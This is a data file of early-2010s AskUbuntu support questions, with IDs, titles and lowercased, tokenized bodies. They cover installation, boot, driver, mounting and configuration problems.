119461	unable to run java file from command like ubuntu	i 'm a newbie to ubuntu and im looking to run java code from the command line . ive checked that path as well . the interesting thing is the code compiles but fails to run ie . user @ ubuntu : ~/py-scripts $ javac main.java ' works well . but when i do . `user @ ubuntu : ~/py-scripts $ java main i get the following error exception in thread `` main '' java.lang.unsupportedclassversionerror : main : unsupported major.minor version 51.0 at java.lang.classloader.defineclass1 ( native method ) at java.lang.classloader.defineclass ( classloader.java:634 ) at java.security.secureclassloader.defineclass ( secureclassloader.java:142 ) at java.net.urlclassloader.defineclass ( urlclassloader.java:277 ) at java.net.urlclassloader.access $ 000 ( urlclassloader.java:73 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:212 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : main . program will exit . '
119462	live cd has black screen hp dv6	attempting to install/try ubuntu ( 11.10 , 12.04 ) on my new laptop , using a livecd ( and tried usb ) . i get the purple screen ( with the man/keyboard at the bottom ) and after that the screen flashes bright white before going black . ubuntu continues to load in the background , with login sound etc but the screen is off . i have tried as many different solutions as i could find including : using nomodestep , xforcevesa , i915.modeset=0 , and also now i915.modeset=1 in boot options ( seperately ) : varying consequences , but either i end up at a blinking cursor with no prompt , a command line ( startx fails : no screen found ) , or the original blank screen again tried booting from virtualbox - it crashes at the same place the screen would go blank when using a cd/usb tried 11.04 : i do n't have this problem but when trying to install , i get a ubi-partman error 141 ( possibly down to the three partitions that came on my laptop ... not sure why hp needed there own separate partition for hp tools ... ) model : hp pavillion dv6 6b08sa processor : amd quad-core a6-3410mx apu with radeon hd 6545g2 dual graphics ( 1.6 ghz 4 mb l2 cache ) chipset : amd rs880m any help would be greatly appreciated . i just want to be able to partition the drive and install ubuntu . i 'm assuming the issue is graphics card related , although i have no confirmation of that . update : tried the áşorkarounds on https : //wiki.ubuntu.com/x/troubleshooting/blankscreen - set gfxpayload=text changed nothing , removing splash did nothing and setting vesafb.nonsense=1 did nothing either . i 'd like to be able to collect some log information somehow , but i ca n't get to a command line from the livecd . tried using the latest 12.04 beta , same issue tried nomodeset without splash or quiet . get the following ( tail of ) output before it freezes on that screen : * starting configure network device security [ ok ] * starting configure network device [ ok ] [ 25.720899 ] ieee80211 phy0 : w1_ops_config : change monitor mode : false ( implement ) [ 25.720923 ] ieee80211 phy0 : w1_ops_config : change power-save mode : false ( implement ) * starting restore sound card ( s ' ) mixer state ( s ) [ fail ] [ 25.721849 ] ieee80211 phy0 : w1_ops_bss_info_changed : qos enabled : false ( implement ) * stopping save kernel messages [ ok ] * starting bluetooth [ ok ] * pulseaudio configured for per-user sessions saned disabled ; edit /etc/default/saned [ 25.988016 ] hci_cmd_timer : hci0 command tx timeout [ 26.207225 ] bad lun ( 0:1 ) [ 26.223735 ] bad target number ( 1:0 ) [ 26.252111 ] bad target number ( 2:0 ) [ 26.272170 ] bad target number ( 3:0 ) [ 26.300154 ] bad target number ( 4:0 ) [ 26.328162 ] bad target number ( 5:0 ) [ 26.344180 ] bad target number ( 6:0 ) [ 26.368142 ] bad target number ( 7:0 ) * checking battery state ... [ ok ] * stopping system v runlevel capability [ ok ] does this give any indication of the problem ? the false ( implement ) messages also reappear when i press the power button to ask it to shutdown , followed by a [ fail ] status for killing remaining processes .
119467	mount ntfs on ubuntu start up - rc.local vs fstab	i 've found out two ways to automount a ntfs partition on ubuntu start up . file /etc/rc.local : mount -t ntfs /dev/sda8 /mnt/data/ or by fstab : uuid=1c02cb8502cb627e /media/data/ ntfs defaults 0 0 is there any difference between them ? is one more recommended than other ? which should i choose ?
119469	10.04 wont boot after power outage	after unexpected power outage 10.04 wo n't boot , the following message appears mount : mounting /dev/disk/by-uuid/***************************** on /root failed : invalid argument mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target file system does n't have /sbin/init no init found . try passing init= bootarg busybox v1.13.3 ( ubuntu 1:1.13.3-1ubuntu7 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands ( initramfs ) _ i have tried rebooting from a livecd but it wont boot and i can not open a terminal to try to fix it by sudo fdisk -l as recommended on other posts . any help would be greatly appreciated
119475	the eclipse icon on my kde desktop looks wrong	here is how it looks : here is how it is configured : i want the icon to look something like this :
119477	power saving script in ubuntu	their should be script which invoke when laptop runs in battery power . it change the cpu-frequency , usb_suspense etc . which script is done this job in ubuntu ? i need to change power saving strategy . every time ubuntu suspense usb device when run in battery power . for that i have to run command manually to off the usb suspense .
119486	error while trying to resize the partition	im running out of space and i tried to resize the partition using g-parted but i got an error : checking for bad sectors ... bad cluster : 0x2904636 - 0x2904636 ( 1 ) bad cluster : 0x290526d - 0x290526e ( 2 ) bad cluster : 0x29052fd - 0x2905300 ( 4 ) bad cluster : 0x2905392 - 0x2905392 ( 1 ) bad cluster : 0x2905425 - 0x2905428 ( 4 ) bad cluster : 0x290555d - 0x2905560 ( 4 ) bad cluster : 0x29055f1 - 0x29055f8 ( 8 ) bad cluster : 0x2905681 - 0x2905688 ( 8 ) bad cluster : 0x29057ac - 0x29057ac ( 1 ) bad cluster : 0x29887dd - 0x29887dd ( 1 ) bad cluster : 0x299a086 - 0x299a086 ( 1 ) bad cluster : 0x348ec05 - 0x348ec05 ( 1 ) bad cluster : 0x353dabb - 0x353dabb ( 1 ) bad cluster : 0x353dba4 - 0x353dba4 ( 1 ) bad cluster : 0x354a162 - 0x354a162 ( 1 ) bad cluster : 0x354a1ce - 0x354a1ce ( 1 ) error : this software has detected that the disk has at least 40 bad sectors . **************************************************************************** * warning : the disk has bad sector . this means physical damage on the disk * * surface caused by deterioration , manufacturing faults or other reason . * * the reliability of the disk may stay stable or degrade fast . we suggest * * making a full backup urgently by running 'ntfsclone -- rescue ... ' then * * run 'chkdsk /f /r ' on windows and rebooot it twice ! then you can resize * * ntfs safely by additionally using the -- bad-sectors option of ntfsresize . * **************************************************************************** i opened the `` disk utility '' and clicked on `` smart data '' button i got this image :
119487	how to download `` rtsp '' flow	i could download a conference from this link ( rtsp : //real2.infn.it/webcast/2012-esploratori-invisibile/esploratori-dell-invisibile.rm ) . how can i do it ? thank you previuosly..
119488	how can i determine which files have been saved on ubuntu one by dăšjă dup ?	i decided to try out the ubuntu backup system application on my 11.10 partition . currently i am just using the default settings to back up folders in my home ( ~ ) folder to the deja-dup folder ( ? ) in my ubuntu one cloud . i have not been able to figure out how to view which files have been saved to the backup location other than by restoring them to a temp folder and then seeing what was restored . i 'm hoping there is a less kludgy way to just find out what has or has not been backed up .
119489	how to use kde dialogs in gtk apps	i want to use kde file dialogs ( file open , file save ) in firefox in kubuntu 12.04 . this requires something like the ancient kgtk script , but for kde 4.x and recent firefox versions . opensuse offers this kind of functionality . kubuntu dropped it , but surely someone has worked on bringing this back to kubuntu ( i hope ) . note , i 'm not asking about theming/looks . i 'm asking about actually using kde file dialogs instead of xul or gtk dialog . and the preference ui.allow_platform_file_picker does n't affect this . i have already tried setting it to true and false . neither options results in using kde dialogs . thanks .
119491	mouse scroll in scale effect in unity	in gnome shell interface when viewing activies , we can scroll the window to zoom in and zoom out . can this be done in unity 3d ?
119499	how to uninstall softwares installed with `apt-get`	i am a newbie and followed the instructions of the site : http : //sejalivre.org/instalando-o-java-6-update-30-no-ubuntu/ in order to install java and some proprietary software based on java on my ubuntu 11.10 box . according to that site , i should use the command : sudo apt-get install openjdk-6-jre icedtea-plugin to install java and the proprietary software . i did that , but started to wonder if that script is clean and not some malware ... for my peace of mind i want to remove everything that was installed with that command .
119504	enabling wireless hardware switch	i am running ubuntu 11.10 on a compaq presario cq57 and i need to enable my wireless hardware switch to use it . i have a wireless key ( f12 ) which shows a light when the switch is active ( it is now red ) . how would i go about enabling in ubuntu ? i 've tried pressing f12 normally and with fn , none work .
119507	how to move the `` hot corner '' of the messaging tray in gnome-shell ?	i have two monitors , side by side , and my main monitor is on the left . in gnome shell , the task-bar can be quickly looked at by moving the mouse to the bottom right hot corner , but since i have a monitor to the right , it is really hard to not simply fly over to the next monitor when trying to access it . can i move that hot corner so that it is on the left bottom corner ?
119518	how to enable dragging files on custom application on launcher ?	in unity , we can drag files on application 's button in the launcher to open that file with that application - however , looks like its hard to change default application . i use komodo as editor , and my goal is to open php files dragging on the komodo button on the launcher . the problem is that with gtk3 is a bit tricky to add custom application to open mimetypes.. i 've created the button from the main menu , then i user mimeopen -d file.php to set komodo as default ; now , if i double-click on a php file , it get open with komodo - but i cant drag php files on komodo button on launcher .
119522	`` and operator '' in pam	i need to prevent users from authenticating through kerberos when the encrypted /home/users has not yet been mounted . ( this is to avoid corrupting the ecryptfs mountpoint ) currently i have these lines in /etc/pam.d/common-auth : auth required pam_group.so use_first_pass auth [ success=2 default=ignore ] pam_krb5.so minimum_uid=1000 try_first_pass auth [ success=1 default=ignore ] pam_unix.so nullok_secure try_first_pass i am planning to use pam_exec.so to execute a script that will exit 1 if the ecyptfs mounts are not ready yet . doing this : auth required pam_exec.so /etc/security/check_ecryptfs will lock me out for good if ecryptfs for some reason fails . in such case i would like to at least be able to login with a local ( non-kerberos ) user to fix the issue . is there some sort of and-operator in which i can say that login through kerberos+ldap is only sufficient if both kerberos authentication and the ecryptfs mount has succeeded ?
119534	easiest way to setup ubuntu as a vpn server	i know there are many tutorials on the net for setting up vpn client and server . i you find one that is simple/short , i am interested only in the server part . for client , i will use os x so i prefer a solution that uses l2tp over ipsec or pptp because i suppose cisco ipsec would cost something . i do n't want to spent too many hours setting it up . you know , maybe someone already made a setup script : ) note : i am using an ec2 micro instance running ubuntu 12.04 on it .
119540	check ubuntu boot hdd for a mbr virus	is it possible to check the mbr of the boot drive of ubuntu for viruses within my ubuntu ? is there any good software to do this ? i heard clamav does not check for mbr viruses .
119541	getting headphone to work on 2011 imac 27 ''	i just installed ubuntu 12.04 on my imac and it works flawlessly apart from the fact that i do n't get sound from my headphone jack . the sounds works fine on the speaker . does anyone have any pointers ?
119547	/etc/hosts modification does not work properly . what to do ?	i have added these lines to the hosts file : 127.0.0.1 localhost adobe.com 127.0.0.1 adobe.com it works perfectly on windows . but in ubuntu 11.10 when i try to access it using firefox the website is opening . google chrome though supporting /etc/hosts configuration . google chrome is displaying : '' it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . ''
119550	flash 11.2.202.228 audio choppy/stutters	the other day my system was upgraded to using flash 11.2.202.228 . since then i have had a slight `` stutter '' or `` choppy '' audio on playbacks . i would guess it is a buffer under run problem . anyone knows what has happened with the new flash-release ?
119551	how do i reset my user password ?	i lost my ubuntu user account password ... i saw some other questions on this topic that had answers telling me to restart the computer , press the left shift key after bios , go to root , type passwd myusername and all this other stuff , but none of that worked . after i typed a new password and retyped it , it gave me an error message saying something like `` authentication manipulation error . '' there was another question complaining about this , but there were n't any useful answers that worked . does anybody know of a way for me to retrieve or reset my password ? am i doing something wrong with that method i mentioned ?
119562	firefox messages in /var/log/messages	i happened to be browsing through /var/log/messages for another reason , and i stumbled across some messages apparently related to firefox like this : apr 5 15:36:59 myserver kernel : [ 18091.188462 ] type=1503 audit ( 1333658219.144:19 ) : operation= '' open '' pid=6396 parent=1 profile= '' /usr/lib/firefox-11.0/firefox { , * [ ^s ] [ ^h ] } '' requested_mask= '' : :r '' denied_mask= '' : :r '' fsuid=1000 ouid=0 name= '' /shr/rivertrip.gpx '' which are really puzzling me because i really do n't see why firefox would know about these files let alone output messages about them . the /shr directory is an ntfs partition i set up on my laptop so i can access it with either ubuntu or windows xp . the messages are consistently showing up for a few of the files in that directory , but not all . i have n't even looked at those files or done anything else with them in a long time ! i have no idea what 's special with those files ; they appear to be picked at random as far as i can tell . i am using ubuntu 10.04 ( lucid ) , kernel linux 2.6.32-38 , gnome 2.30.2 and firefox 11.0 . i hope someone can explain these spooky messages !
119564	horible lag on xubuntu media center setup	i am setting up a media center running xubuntu 11.10 as a media center . it is using the xfce desktop enviroment . i have the nvidia drivers installed from the additional drivers program , and uninstalled all but the esennitial software . the computer is a dell dimension 3000 . you can view detailed technical specifications here . the graphics card installed is a geforce 8400 gs . i have installed all updates through update manager . what can i do to fix the horrible lag ? it makes watching tv impossible.i have uploaded two videos of the lag , here and here . the second one does not have sound because the sound stops playing on some channels that lag a lot . the tv card is a hauppage 950q usb , and the tv recording program is kaffiene . please help me with this , i am trying to do this to show how great ubuntu is to the rest of the family .
119565	how to load unity-launcher in standalone session ?	i want to auto-start unity-launcher in a stand alone session without loading the top panel with it , like in this picture : so how to do this ?
119566	how to set up an sstp vpn connection	the question is simple : how to set up an sstp vpn connection in ubuntu 11.10 ? as of this moment i have n't been able to find a way to make an sstp vpn connection .
119571	where can i find messages related to apache start up ?	apache did n't start up automatically like it usually does . i 'd like to try to find out why . it looks like it never started up today , so nothing in /var/log/apache2/error.log since it never ran . as i understand it , the apache script is /etc/init.d/apache2 so i 'd like to find some messages somewhere regarding this script . however , i ca n't find anything in /var/log/messages or the syslog . is there anywhere in the system where it says `` yep , i 'm starting up /etc/init.d/apache2 now ; it worked '' or especially `` it did n't work and here 's why ! '' ? i am using ubuntu release 10.04 ( lucid ) , kernel linux 2.6.32-38 , and gnome 2.30.2 .
119574	is there a volume mixer ?	i was using windows 7 and decided to replace it with ubuntu 12.04 , but i could n't find any program that do the job of `` volume mixer '' like in windows 7 : if there is any program or a way you know to do so , i would really appreciate your help .
119578	how to fix slow wireless on machines with intel wireless cards ?	i have looked through all the previous questions but turning power management off for the wi-fi card did n't work . this problem seems to be with the lenovo thinkpads . i switched to ubuntu 11.10 from windows 7 3 days ago so i 'm new to the operating system .
119579	how to reassociate torrent download in firefox to another torrent program	for now my girlfriend is using transmission as the torrent downloader . she downloads magnet links and they start after a couple of seconds to download the content . today she wants to try qbittorrent . firefox does not show an option when downloading the magnet link , it just starts transmission assuming that it is the one she wants . she downloaded qbittorrent and thought that firefox would show an option to download either from transmission or qbittorrent . since there is no such option , how can it be reassociated or replaced the transmission for qbittorrent in firefox so that when she downloads the next torrent or magnet link it shows qbittorrent .
119580	what 's a good way to run a virtual copy of ubuntu on windows 7 ?	i have a mathematical program that runs on 64 bit ubuntu . i need to run it on my windows 7 workstation , preferably without having to install ubuntu instead of windows , because this is a short term need . is there a way i could run 64-bit ubuntu as a virtual machine on my windows 7 box ?
119591	davicom semiconductor , inc. 21x4x dec-tulip not detected by wireshark but ip operational	recently flipped to ubuntu 11.10 on a dell 4300 ( intel ) . getting ip address and no issues ( ping/surf ) but wireshark unable to detect eth0 interface . i see references in forums to blacklist tulip but looks like i am running dmfe . not sure if the blacklist is required and where to go from here . maybe driver update ? got a little lost looking in that area . some h/w details below ( ip/mac/hostname removed ) linux xxxxxx 3.0.0-17-generic # 30-ubuntu smp thu mar 8 17:34:21 utc 2012 i686 i686 i386 gnu/linux network-admin ( hosts tab ) does not list eth0 , only loopback and bunch of ipv6 interfaces ifconfig eth0 link encap : ethernet hwaddr xxxxxxxx inet addr:192.168.x.xx bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : xxxxxxxxxxx 64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:36662 errors:0 dropped:1 overruns:0 frame:0 tx packets:24975 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:42115779 ( 42.1 mb ) tx bytes:3056435 ( 3.0 mb ) interrupt:18 base address:0xe800 lspci 02:09.0 ethernet controller : davicom semiconductor , inc. 21x4x dec-tulip compatible 10/100 ethernet ( rev 31 ) subsystem : device 4554:434e flags : bus master , medium devsel , latency 64 , irq 18 i/o ports at e800 [ size=256 ] memory at fe1ffc00 ( 32-bit , non-prefetchable ) [ size=256 ] expansion rom at fe200000 [ disabled ] [ size=256k ] capabilities : [ 50 ] power management version 2 kernel driver in use : dmfe kernel modules : dmfe hwinfo -- netcard 20 : pci 209.0 : 0200 ethernet controller [ created at pci.318 ] unique id : rbuf.0ngk5zs9c0d parent id : 6nw+.siohrluzzi4 sysfs id : /devices/pci0000:00/0000:00:1e.0/0000:02:09.0 sysfs busid : 0000:02:09.0 hardware class : network model : `` davicom 21x4x dec-tulip compatible 10/100 ethernet '' vendor : pci 0x1282 `` davicom semiconductor , inc. '' device : pci 0x9102 `` 21x4x dec-tulip compatible 10/100 ethernet '' subvendor : pci 0x4554 subdevice : pci 0x434e revision : 0x31 driver : `` dmfe '' driver modules : `` dmfe '' device file : eth0 i/o ports : 0xe800-0xe8ff ( rw ) memory range : 0xfe1ffc00-0xfe1ffcff ( rw , non-prefetchable ) memory range : 0xfe200000-0xfe23ffff ( ro , non-prefetchable , disabled ) irq : 18 ( 61379 events ) hw address : 00:08 : a1:01:35:70 link detected : yes module alias : `` pci : v00001282d00009102sv00004554sd0000434ebc02sc00i00 '' driver info # 0 : driver status : dmfe is active driver activation cmd : `` modprobe dmfe '' config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 11 ( pci bridge )
119593	ca n't change settings for mobile broadband dongle - button is greyed out	i was with virginbroadband.com.au ( australia ) . my huawai 3g dongle was working great on ubuntu , however i have changed isp 's . i unlocked the modem , and put in the new sim . i have tested this in my windows pc and it connects to the new ( optus ) network a-ok and it all works . when i put this dongle ( the same one that was working fine in ubuntu ) into that same ubuntu netbook it simply wo n't connect . when i try to go into the dialog to try and add or change settings the button to change or update settings is greyed out , i ca n't select it . apparently since this dongle was already recognized the broadband setup wizard wo n't start , and i have no idea how to get it to start ( presuming it has the ability to configure an already recognized dongle ) . what do i have to do to either enable the ability to change the configuration for this setup , or to blow away the one that is set up so the broadband wizard will re-start and let me configure a new one . can anyone provide simple instructions for doing this ? i 'm using ubuntu with the cinnamon desktop
119594	why is unity 2d running so much faster on system with ati 6770 ?	i 'm new to linux in general . i installed 11.10 the other day , and began enjoying . i 've noticed , however , that when i choose `` ubuntu '' from the login menu ( vs `` ubuntu 2d ) , the system runs noticeably slower . nothing major , but window movements are jerky , programs take longer to open , and log-in is substantially slower . when i load `` ubuntu 2d '' , everything is snappy . my system is an athlon ii x4 @ 3.0 ghz and an amd 6770 . ubuntu tells me that the proprietary drivers are non-active , but i did install catalyst earlier . something tells me this has to do with drivers . what 's my next step ?
119597	grub rescue - error : unknown filesystem	i have a multiboot system set up . the system has three drives . multiboot is configured with windows xp , windows 7 , and ubuntu - all on the first drive . i had a lot of unpartitioned space left on the drive and was reserving it for adding other oses and for storing files there in the future . one day i went ahead and downloaded partition wizard and created a logical ntfs partition from within windows 7 , still some unpartitioned space left over . everything worked fine , until i rebooted the computer a few days later . now i 'm getting : error : unknown filesystem . grub rescue > first of all i was surprised not to find any kind of help command , by trying : help , ? , man , -- help , -h , bash , cmd , etc . now i 'm stuck with non-bootable system . i have started researching the issue and finding that people usually recommend to boot to a live cd and fix the issue from there . is there a way to fix this issue from within grub rescue without the need for live cd ? update by following the steps from persist commands typed to grub rescue , i was able to boot to initramfs prompt . but not anywhere further than that . so far from reading the manual on grub rescue , i was able to see my drives and partitions using ls command . for the first hard drive i see the following : ( hd0 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) i now know that ( hd0 , msdos6 ) contains linux on it , since ls ( hd0 , msdos6 ) / lists directories . others will give `` error : unknown filesystem . '' update 2 after the following commands i am now getting to the boot menu and can boot into windows 7 and ubuntu , but upon reboot i have to repeat these steps . ls ls ( hd0 , msdos6 ) / set root= ( hd0 , msdos6 ) ls / set prefix= ( hd0 , msdos6 ) /boot/grub insmod /boot/grub/linux.mod normal update 3 thanks shashank singh , with your instructions i have simplified my steps to the following . i have learned from you that i can replace msdos6 with just a 6 and that i can just do insmod normal instead of insmod /boot/grub/linux.mod . now i just need to figure out how to save this settings from within grub itself , without booting into any os . set root= ( hd0,6 ) set prefix= ( hd0,6 ) /boot/grub insmod normal normal update 4 well , it seems like it is a requirement to boot into linux . after booting into ubuntu i have performed the following steps described in the manual : sudo update-grub sudo grub-install /dev/sda this did not resolve the issue . i still get the grub rescue prompt . what do i need to do to permanently fix it ? i have also learned that drive numbers as in hd0 need to be translated to drive letters as in /dev/sda for some commands . hd1 would be sdb , hd2 would be sdc , and so on . partitions listed in grub as ( hd0 , msdos6 ) would be translated to /dev/sda6 . update 5 i could not figure out why the following did not fix grub : sudo update-grub sudo grub-install /dev/sda so i downloaded boot-repair based on an answer from https : //help.ubuntu.com/community/boot-repair post . that seemed to do the trick after i picked the `` recommended repair ( repairs most frequent problems ) '' option .
119601	what can i do to turn my screen brightness down when simple interface methods do not work ?	i have installed ubuntu 11.10 on my hp dv6 and so far the only problem i 've had is that i ca n't turn down the screen brightness . i use the `` hot key '' the `` short cut keys '' i go to settings and make the slider all the way down to dim and nothing ... my screen remains at the brightest setting ... .giving me a real bad battery life . also , i 'm accustomed to using low screen settings for reading/writing documents , emails , etc . i 've tried using programs such as f.lux and redshift but these attempts have been without success . i seem to find many others with the same problems . anyone have any ideas ?
119607	how do i fix drivers in pre-boot ubuntu installer disk ?	my computer arrived yesterday , it runs perfectly fine with windows 7 , so i know it 's a problem with my ubuntu 11.10 installer . it will boot , and it appears to be loading properly ( as in , the cd drive does all of its functions [ as it would on any other computer loading a linux installer ] until i manually shut down my computer ) , but after the boot logo , there is , as usual a screen which normally displays output from the kernel . the problem lies shortly after loading this output screen ; it appears to try to load drivers which do n't work , and so my monitor goes completely black ( no backlight ) , and my cd-rom keeps running , but i just can not see any of the graphical output . my idea is that it 's a problem with the drivers , and so i request anyone 's help on finding the drivers for a radeon hd 6600m graphics card ( hooked up with an amd a8 processor ) , and any help with getting ubiquity to show up on my screen when i boot ( which is not happening , obviously ) . last thing , i had the same issue with fedora 16 , and so i 'm almost sure it 's a problem with the drivers . if you have any advice as to how to install drivers , without access to a linux commandline , on the disk i 'm trying to install to , that 'd be nice to hear . i 'm not afraid to install proprietary drivers , so long as they work .
119609	when dows ubuntu automount ntfs partitions ? and adding bind	i have an ntfs partition for storing my files only and seeing them in both windows 7 and ubuntu 11.10 . when i boot ubuntu i can access it with no trouble at all in /media/archivos ( it 's the disk label ) . i want to bind some folders in that partition to my documents , downloads , etc. , folders so i use the same in both oses . i learned what lines to add in /etc/fstab.m ex : /media/archivos/documentos /home/fede/documentos none defaults , bind 0 0 but i edit fstab and that partition does n't appear ! only my swap and my ext4 partitions appear in that file . so when does ubuntu mount my other partitions , and in what file can i add the bind options i want ? or can i add the ntfs partition to fstab and it will be mounted sooner than it is mounted now ? or will ubuntu try to mount it twice generating an error ? thanks !
119610	installing valgrind on a 3.x kernel	i was reading learn c the hard way when i stumbled upon and followed the instructions for installing valgrind , the c debugger . however , when i ran ./configure to setup build configurations , i got checking for the kernel version ... unsupported ( 3.0.0-17-generic ) configure : error : valgrind works on kernels 2.4 , 2.6 i am running ubuntu 11.10 , on the kernel linux 3.0.0-17-generic x86_64 . the answer may be obvious but i 'm not acquainted with linux : how do i get valgrind working on my computer ? thanks .
119614	ca n't install spotify linux preview	i 'm having trouble installing the spotify linux preview . i 'm kinda new to ubuntu so i 'm not sure if i did something wrong . first , in the terminal , i ran this : sudo gedit /etc/apt/sources.list at the bottom , i added this : deb http : //repository.spotify.com stable non-free # deb-src http : //repository.spotify.com stable non-free then i ran this : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 4e9cff4e next : sudo apt-get update it seemed to have gone well , as there were no error messages . so next , i ran this : sudo apt-get install spotify-client-qt but when i did , i got this : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : spotify-client-qt : depends : spotify-client but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . any ideas ? edit i 'm using ubuntu 11.10 , and yes , i had the same error message the user had in that question : failed to fetch http : //repository.spotify.com/dists/stable/release unable to find expected entry non-free/source/sources in meta-index file ( malformed release file ? ) some index files failed to download , they have been ignored , or old ones used instead . i added the # before the second line ( which was n't there ) and i no longer received that error message . also , in reply to baha誰ka 's comment , i ran that command ( sudo apt-get install spotify-client ) and i got the following : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : spotify-client : depends : libqt4-webkit ( > = 4.5.0 ) but it is not going to be installed depends : libssl0.9.8 but it is not going to be installed recommends : libavcodec53 but it is not going to be installed or libavcodec52 but it is not installable recommends : libavformat53 but it is not going to be installed or libavformat52 but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
119615	empty file ca n't be removed from desktop on ubuntu 11.10	before the error i 've modified my ~/.config/user-dirs.dirs xdg_desktop_dir=” $ home/área de trabalho” i 've changed the line above by xdg_desktop_dir=” $ home/desktop” and updated with $ xdg-user-dirs-gtk-update $ xdg-user-dirs-update nothing wrong until here . testing modifications after that , i was testing if everything was ok. first , i created an empty file on desktop $ touch desktop/teste.txt the file was created with success . but , it was not appearing in my desktop -- - i could only see the file via terminal or nautilus , opening the desktop folder . bug so , i 've opened the nautilus and -- - i do n't know why -- - dragged and drop the teste.txt file from the desktop folder in nautilus to the visible desktop . then , i 've removed the file via terminal $ rm desktop/teste.txt to see if the file would disappear . but no , it did n't . it stills here . when i click with right bottom , rename , move to trash options are gray . i tried pressing delete button , but nothing . f2 does not work either . what should i do ? have you seen this bug before ? screenshots file that ca n't be deleted : http : //i44.tinypic.com/kdqz4y.png nautilus desktop and the desktop trying to open the file : http : //i39.tinypic.com/2nkhnps.png it says : it was not possible to show /home/victorhugo/desktop/teste.txt the file type is unknown edit the file disappeared . i just had to reboot the ubuntu . thanks everyone !
119622	video conversion tool for ubuntu ?	is there is there any video conversion tool in ubuntu ? which supports all format of video file .
119635	how can i install matlab without an install file ?	my matlab iso does n't have the install file , only has a .exe file to install on windows platform , where can i find the install file ? i 'm working with this instructions http : //www.youtube.com/watch ? v=9zndkhp2vlq sorry but i 'm new in ask ubuntu and i ca n't show screenshot on this post i 'm working on ubuntu 11.10 and matlab r2011b thanks for your patience
119638	how do i open pdf files in kword ?	i have read in many places that kword can open pdf and save it in doc format ! but on ubuntu 11.10 i can not open pdf using kword as it does not showing pdf as supported files ? ! ! ! i want a pdf to doc converter on ubuntu 11.10 . i can open pdf using libreofffice but it displaying garbled characters with over 1000+ pages for a pdf with only 15 pages . what can i do so that kword became able to open pdf and save it to doc or odt format ? ?
119644	what chording keyboard software is available ?	i 'm looking for a chording software for ubuntu . for using chorded combinations for typing only with one hand . i 'm fairly certain one exists because i read about it a couple months ago .
119645	sysv-rc-conf : would apache2 start if i turn it off at run level6 but not in level5 ?	i wan na start apache2 everytime i boot up sudo sysv-rc-conf -- list apache2 apache2 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off from the follow result using sysv-rc-conf , if apache2 turn off at runlevel 6 , would it be start up when i turn on my ubuntu ?
119648	how to create a wifi network to share files between a ubuntu 12.04 pc and windows 7 ( 32 bit ) pc	i want to share files with a windows 7 ( 32 bit ) laptop . i have another laptop with ubuntu 12.04 installed . how can i share files using a wifi network over the two systems ?
119650	what is the alternative for teamviewer ?	is there any ubuntu alternative for team-viewer software for windows ?
119659	macbook pro touchpad	just installed ubuntu 11.10 on my macbook pro 7.1 model . it 's working great , but i ca n't get used to the reduced functionality of the touchpad . i 've read that mtrack works pretty well at bringing that functionality back . however , i 'm having a hard time installing it . all i can find is the source course from the git repository : xf86-input-mtrack how and what do i need to do to either install this driver or just get the touchpad back to normal ? edit : found this answer here , and it works pretty well : answer
119660	problem with grub-efi	i am installing ubuntu on my macbook , following the instructions here : http : //www.rodsbooks.com/ubuntu-efi/index.html everything has gone well so far . but i have now come to number 19 . the cd with grub2 is in the drive , but when i type 'sudo apt-get install grub-efi ' it says : package grub-efi is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : grub2-common grub-common the grub iso i downloaded and burned was this one : http : //forja.cenatic.es/frs/download.php/1381/super_grub_disk_hybrid-1.98s1.iso
119665	how can you update less css compiler to the latest version from apt-get ?	you can install less css compiler easy : apt-get install lessc but that only installs version 1.1.0 . how can you update to the very latest version ? ( the latest version is 1.3.0 ) -- update -- i want to use the lessc command-line tool , not the client-side implentation .
119667	which programming language to develop software for usc that also runs on other os ? ( windows / os x )	i have skills in java and c # . first i had a closer look at java ( eclipse with windowbuilder-plugin ) . - swing : but there is no natvie gui-support for gtk3 ( e.g. , hud seems not to work ) then i looked at java - swt : it is to heavy . i want do code a small app that improves the ubuntu desktop . i do n't want to ship a program with eclipse included . after that i found c # mono ( monodevelop ) : gtk # is only for gtk2 available . a gtk3 port will come soon but is it possible to convert the program from gtk2 to gtk3 without extra adaptations ? the next bad thing is , that mono is now dropped from ubuntu lts 12.04 . so i have no chance that my app would be a default app in an official ubuntu live cd . ( this is also a factor for me to choose a programming language ) . i know there are other techs but i want to use as programming language java or c # .
119668	share ext4 partition over network	i have an ext4 partition ( not auto-mounted ) that i would like to share ( entirely ) in my home that contains mac osx , windows and linux machines ( currently the most important is sharing with the mac ) . how may i do this ?
119669	touchpad pointer moves randomly upon release	i 've just installed 11.10 . i then updated my install . now , whenever i move the pointer via the touchpad it jumps around upon release . it is totally unusable and i 'm using a mouse which is fine . i have a sony vaio vpce82z0e . everything else is working perfectly , any help is appreciated .
119680	sennheiser mm450-x bluetooth headset connected but not working	sennheiser mm450-x bluetooth headset gets recognized out of the box in ubuntu 12.04 beta 64-bit . i used this workaround to get past the reconnection problem : issues with bluetooth connections in 11.10 although the device is successfully connected i am not able to hear any sound into the headphones . some interference noise is produced instead .
